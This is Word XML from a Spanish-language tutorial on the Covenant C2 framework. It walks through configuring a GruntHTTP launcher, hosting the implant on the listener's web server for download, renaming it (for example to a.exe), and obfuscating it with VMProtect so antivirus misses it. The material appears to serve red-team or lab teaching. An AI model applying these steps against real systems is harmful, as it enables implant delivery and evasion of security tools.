        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1DD27910" wp14:editId="05CBE933">
            <wp:extent cx="5400040" cy="2719705"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="398048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8198" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId277"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0FB8AEA7" w14:textId="08BD0130" w:rsidR="00D62AA6" w:rsidRDefault="00D62AA6" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09F126F2" w14:textId="44B017E6" w:rsidR="00D62AA6" w:rsidRDefault="00D62AA6" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Ahora pasaré a explicar las opciones:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1844DF3D" w14:textId="77777777" w:rsidR="00D62AA6" w:rsidRDefault="00D62AA6" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79AB7A40" w14:textId="138709B0" w:rsidR="00D62AA6" w:rsidRDefault="00D62AA6" w:rsidP="00D62AA6">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Lisnter: Explica el listener que usará el lanzador, en este caso usaré el creado anteriormente.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0477F8EA" w14:textId="634CB6CA" w:rsidR="00D62AA6" w:rsidRDefault="00D62AA6" w:rsidP="00D62AA6">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Plantilla: Usaremos la plantilla GruntHTTP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4767DD8C" w14:textId="1CFCBBD1" w:rsidR="00D62AA6" w:rsidRDefault="00D62AA6" w:rsidP="00D62AA6">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Delay adn Jitter: Estas configuraciones controlan la frecuencia con que el Grunt se comunicará con Covenant. Dejaremos los valores por defecto.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="616418EE" w14:textId="5A0287CC" w:rsidR="00D62AA6" w:rsidRDefault="00D62AA6" w:rsidP="00D62AA6">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>ConnectAttempts y KillDate: Estos ajustes controlan cuando un Grunt dejará de intentar comunicarse con Covenant. Dejaremos los valores por defecto.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB1382B" w14:textId="77777777" w:rsidR="000174F7" w:rsidRDefault="000174F7" w:rsidP="000174F7">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FE28D01" w14:textId="7E672BB2" w:rsidR="000174F7" w:rsidRDefault="000174F7" w:rsidP="000174F7">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Ahora voy a mostrar una opción para alojar en el servidor http, que se crea al crear el listener, el Grunt creado.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD0F61E" w14:textId="77777777" w:rsidR="000174F7" w:rsidRDefault="000174F7" w:rsidP="000174F7">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="209169B5" w14:textId="5860564B" w:rsidR="000174F7" w:rsidRDefault="000174F7" w:rsidP="000174F7">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Para esto vamos a ir a nuestro listener:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B1B841" w14:textId="77777777" w:rsidR="000174F7" w:rsidRDefault="000174F7" w:rsidP="000174F7">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A349541" w14:textId="77777777" w:rsidR="00ED3279" w:rsidRDefault="00ED3279" w:rsidP="000174F7">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BFD84C2" w14:textId="77777777" w:rsidR="00ED3279" w:rsidRDefault="00ED3279" w:rsidP="000174F7">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B9A3841" w14:textId="77CBB513" w:rsidR="000174F7" w:rsidRDefault="000174F7" w:rsidP="000174F7">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5CEE8CB1" wp14:editId="2FABF831">
            <wp:extent cx="5400040" cy="5400040"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1965984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84406" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId278"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76030C8" w14:textId="77777777" w:rsidR="000174F7" w:rsidRDefault="000174F7" w:rsidP="000174F7">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1023B297" w14:textId="215CA725" w:rsidR="000174F7" w:rsidRDefault="000174F7" w:rsidP="000174F7">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Iremos a Hosted Files</w:t>
      </w:r>
      <w:r w:rsidR="004701B5">
        <w:t xml:space="preserve"> y le daremos a Create:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30373AAF" w14:textId="77777777" w:rsidR="00C14BAC" w:rsidRDefault="00C14BAC" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F2378F8" w14:textId="77777777" w:rsidR="00ED3279" w:rsidRDefault="00ED3279" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="662A4FF2" w14:textId="7A1378A0" w:rsidR="00ED3279" w:rsidRDefault="00ED3279" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="58077CF9" wp14:editId="14F809B0">
            <wp:extent cx="5400040" cy="5400040"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1557933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3302" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId279"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3C96910" w14:textId="77777777" w:rsidR="00ED3279" w:rsidRDefault="00ED3279" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40400B10" w14:textId="6DEF9A23" w:rsidR="00ED3279" w:rsidRDefault="00ED3279" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Crearemos el path en donde vamos alojar el Grunt, en mi caso le llamare grunt, y </w:t>
      </w:r>
      <w:r w:rsidR="00316CB3">
        <w:t>elegiremos</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> donde está el Grunt:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D71CC4E" w14:textId="77777777" w:rsidR="00ED3279" w:rsidRDefault="00ED3279" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69194FF0" w14:textId="77777777" w:rsidR="00ED3279" w:rsidRDefault="00ED3279" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="046D50A2" w14:textId="77777777" w:rsidR="00ED3279" w:rsidRDefault="00ED3279" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="539BFDC5" w14:textId="1887E5F6" w:rsidR="00ED3279" w:rsidRDefault="00ED3279" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="308DBED9" wp14:editId="1DD4F373">
            <wp:extent cx="5400040" cy="5400040"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="155071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19224" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId280"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6B7629A7" w14:textId="77777777" w:rsidR="00ED3279" w:rsidRDefault="00ED3279" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C27C736" w14:textId="33685641" w:rsidR="00ED3279" w:rsidRDefault="00ED3279" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Por último pulsaremos en Create:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="572A22B9" w14:textId="77777777" w:rsidR="00ED3279" w:rsidRDefault="00ED3279" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6881CEE2" w14:textId="4AA89C93" w:rsidR="00ED3279" w:rsidRDefault="00ED3279" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="418B835A" wp14:editId="5D5C7406">
            <wp:extent cx="5400040" cy="5400040"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="458268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8229" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId281"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6A1B027" w14:textId="77777777" w:rsidR="00ED3279" w:rsidRDefault="00ED3279" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26EB4928" w14:textId="15D05CF3" w:rsidR="00ED3279" w:rsidRDefault="00ED3279" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Ahora podremos conectaros a la IP de esta máquina en este caso http:192.168.1.44\grunt y así descargarlo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511E14E2" w14:textId="77777777" w:rsidR="00ED3279" w:rsidRDefault="00ED3279" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EC5DAEB" w14:textId="77777777" w:rsidR="00ED3279" w:rsidRDefault="00ED3279" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33B1253E" w14:textId="77777777" w:rsidR="00ED3279" w:rsidRDefault="00ED3279" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="320DA32D" w14:textId="461BEB92" w:rsidR="00ED3279" w:rsidRDefault="00ED3279" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="382918AE" wp14:editId="209EA7FD">
            <wp:extent cx="5400040" cy="5400040"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="756413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3501" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId282"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6682F94" w14:textId="77777777" w:rsidR="00D34DAF" w:rsidRDefault="00D34DAF" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2474ACD7" w14:textId="0C8B070B" w:rsidR="00D34DAF" w:rsidRDefault="00D34DAF" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Podría cambiarle el nombre y llamarlo de cualquier manera, como por ejemplo ahora a.exe:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="718DB8CF" w14:textId="77777777" w:rsidR="00D34DAF" w:rsidRDefault="00D34DAF" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13183433" w14:textId="0DE4E2F6" w:rsidR="00D34DAF" w:rsidRDefault="00D34DAF" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="20E3B290" wp14:editId="76BB9519">
            <wp:extent cx="5400040" cy="5400040"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="133107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1998" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId283"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9DEEAA6" w14:textId="77777777" w:rsidR="00ED3279" w:rsidRDefault="00ED3279" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BB1A2FD" w14:textId="77777777" w:rsidR="00ED3279" w:rsidRDefault="00ED3279" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7798B52B" w14:textId="77777777" w:rsidR="00ED3279" w:rsidRDefault="00ED3279" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="017E71F1" w14:textId="77777777" w:rsidR="00ED3279" w:rsidRDefault="00ED3279" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DE876B7" w14:textId="77777777" w:rsidR="00ED3279" w:rsidRDefault="00ED3279" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0001C8B3" w14:textId="77777777" w:rsidR="00ED3279" w:rsidRDefault="00ED3279" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55C28B1E" w14:textId="77777777" w:rsidR="00ED3279" w:rsidRDefault="00ED3279" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E1268C6" w14:textId="77777777" w:rsidR="00ED3279" w:rsidRDefault="00ED3279" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="239C3B7E" w14:textId="77777777" w:rsidR="00ED3279" w:rsidRDefault="00ED3279" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79D266CE" w14:textId="77777777" w:rsidR="00ED3279" w:rsidRDefault="00ED3279" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1067E387" w14:textId="77777777" w:rsidR="00ED3279" w:rsidRDefault="00ED3279" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="506159F2" w14:textId="77777777" w:rsidR="0028446C" w:rsidRDefault="0028446C" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06182FDB" w14:textId="77777777" w:rsidR="00ED3279" w:rsidRDefault="00ED3279" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71501F94" w14:textId="652C282E" w:rsidR="00ED3279" w:rsidRDefault="00ED3279" w:rsidP="00ED3279">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="43" w:name="_Toc135576000"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Ofuscado de Grunt:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="43"/>
    </w:p>
    <w:p w14:paraId="6AD2611F" w14:textId="77777777" w:rsidR="00ED3279" w:rsidRDefault="00ED3279" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F0D6722" w14:textId="4A2931DF" w:rsidR="00AE4AB2" w:rsidRDefault="005757F6" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Veremos ahora como ofuscar ese binario para que el antivirus no los detecte, pues Covenant al ser un proyecto libre</w:t>
      </w:r>
      <w:r w:rsidR="0028446C">
        <w:t xml:space="preserve"> y conocido</w:t>
      </w:r>
      <w:r>
        <w:t>, sus binarios están en las bases de datos de los antivirus.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD435DC" w14:textId="77777777" w:rsidR="00277D0C" w:rsidRDefault="00277D0C" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D5A99A2" w14:textId="6F23B344" w:rsidR="00277D0C" w:rsidRDefault="00277D0C" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ahora vamos usar este programa : </w:t>
      </w:r>
      <w:hyperlink r:id="rId284" w:history="1">
        <w:r w:rsidRPr="00252114">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>https://vmpsoft.com/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>, que básicamente hace lo mismo que el anterior, vamos a desactivar el antivirus de Windows para encriptar el archivo y luego vamos a ver si lo detecta:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D69625C" w14:textId="77777777" w:rsidR="00277D0C" w:rsidRDefault="00277D0C" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="588D01DA" w14:textId="49985351" w:rsidR="00277D0C" w:rsidRDefault="00277D0C" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="73C12430" wp14:editId="513702D0">
            <wp:extent cx="5400040" cy="5805805"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="2134449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9988" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId285" cstate="screen">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="5805805"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A52289" w14:textId="77777777" w:rsidR="00277D0C" w:rsidRDefault="00277D0C" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BB02573" w14:textId="296B1F0A" w:rsidR="00277D0C" w:rsidRDefault="00277D0C" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Ahora crearemos el Grunt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA95148" w14:textId="05D3DB50" w:rsidR="00277D0C" w:rsidRDefault="00277D0C" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Daremos cli</w:t>
      </w:r>
      <w:r w:rsidR="00316CB3">
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> en Download:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F095BC7" w14:textId="77777777" w:rsidR="00277D0C" w:rsidRDefault="00277D0C" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F8A0082" w14:textId="138CCFE8" w:rsidR="00277D0C" w:rsidRDefault="00277D0C" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1C10AB5C" wp14:editId="44B81879">
            <wp:extent cx="5400040" cy="5400040"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1544884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84422" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId286"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4C23E885" w14:textId="77777777" w:rsidR="001F19CE" w:rsidRDefault="001F19CE" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34C0303E" w14:textId="2E6EE238" w:rsidR="001F19CE" w:rsidRDefault="00277D0C" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Copiaremos el Grunt a una carpeta del escritorio.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A8D4139" w14:textId="77777777" w:rsidR="00277D0C" w:rsidRDefault="00277D0C" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E3FB991" w14:textId="2535BCF4" w:rsidR="00277D0C" w:rsidRDefault="00277D0C" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>El VMProyect tiene una versión demo que es la que voy usar, para instalarlo necesitaremos una máquina Windows, la instalación es sencilla no hay más que darle a siguiente.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76899859" w14:textId="77777777" w:rsidR="00277D0C" w:rsidRDefault="00277D0C" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="694CEB3F" w14:textId="50BEB86F" w:rsidR="00277D0C" w:rsidRDefault="00277D0C" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Ahora lo abriremos:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5459CECE" w14:textId="77777777" w:rsidR="00277D0C" w:rsidRDefault="00277D0C" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34584D56" w14:textId="3CC176EE" w:rsidR="00277D0C" w:rsidRDefault="00277D0C" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="64FC6359" wp14:editId="5D49103B">
            <wp:extent cx="5400040" cy="5805170"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="680245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5058" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId287"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4BB0D1FA" w14:textId="77777777" w:rsidR="00277D0C" w:rsidRDefault="00277D0C" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D17BAED" w14:textId="33A5E6EE" w:rsidR="00277D0C" w:rsidRDefault="00277D0C" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Y le daremos a open:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51DB9716" w14:textId="77777777" w:rsidR="00277D0C" w:rsidRDefault="00277D0C" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63303441" w14:textId="03834138" w:rsidR="00277D0C" w:rsidRDefault="00277D0C" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5D69A3A9" wp14:editId="79984FB2">
            <wp:extent cx="5400040" cy="3042285"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="1435976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6658" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId288" cstate="screen">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="3042285"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3775FFEB" w14:textId="77777777" w:rsidR="00277D0C" w:rsidRDefault="00277D0C" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BC0A89F" w14:textId="2A4836A6" w:rsidR="0028446C" w:rsidRDefault="00277D0C" w:rsidP="0028446C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>E elegiremos el Grunt</w:t>
      </w:r>
      <w:r w:rsidR="0028446C">
        <w:t xml:space="preserve"> una vez abierto tendremos esta pantalla:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E89099" w14:textId="19119370" w:rsidR="00277D0C" w:rsidRDefault="00277D0C" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58D90C46" w14:textId="77777777" w:rsidR="00277D0C" w:rsidRDefault="00277D0C" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
